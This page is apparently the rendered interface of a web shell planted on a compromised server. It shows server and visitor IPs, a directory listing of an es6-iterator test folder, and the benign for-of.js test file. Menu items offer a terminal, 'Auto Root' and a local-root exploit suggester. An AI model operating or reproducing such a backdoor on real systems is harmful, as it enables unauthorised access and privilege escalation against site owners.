Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.140.201.179
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
es6-iterator /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
#
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
.eslintrc.json
44
B
-rw-rw-r--
2022-08-30 11:49
array.js
2.53
KB
-rw-rw-r--
2022-08-30 11:49
for-of.js
1.17
KB
-rw-rw-r--
2022-08-30 11:49
get.js
698
B
-rw-rw-r--
2022-08-30 11:49
index.js
3.43
KB
-rw-rw-r--
2022-08-30 11:49
is-iterable.js
568
B
-rw-rw-r--
2022-08-30 11:49
string.js
848
B
-rw-rw-r--
2022-08-30 11:49
valid-iterable.js
566
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; var ArrayIterator = require("../array") , slice = Array.prototype.slice; module.exports = function (t, a) { var i = 0, x = ["raz", "dwa", "trzy"], y = {}, called = 0; t(x, function () { a.deep(slice.call(arguments, 0, 1), [x[i]], "Array " + i + "#"); a(this, y, "Array: context: " + i++ + "#"); }, y); i = 0; t((function () { return arguments; }("raz", "dwa", "trzy")), function () { a.deep(slice.call(arguments, 0, 1), [x[i]], "Arguments" + i + "#"); a(this, y, "Arguments: context: " + i++ + "#"); }, y); i = 0; t(x = "foo", function () { a.deep(slice.call(arguments, 0, 1), [x[i]], "String " + i + "#"); a(this, y, "Regular String: context: " + i++ + "#"); }, y); i = 0; x = ["r", "💩", "z"]; t("r💩z", function () { a.deep(slice.call(arguments, 0, 1), [x[i]], "String " + i + "#"); a(this, y, "Unicode String: context: " + i++ + "#"); }, y); i = 0; t(new ArrayIterator(x), function () { a.deep(slice.call(arguments, 0, 1), [x[i]], "Iterator " + i + "#"); a(this, y, "Iterator: context: " + i++ + "#"); }, y); t(x = ["raz", "dwa", "trzy"], function (value, doBreak) { ++called; return doBreak(); }); a(called, 1, "Break"); };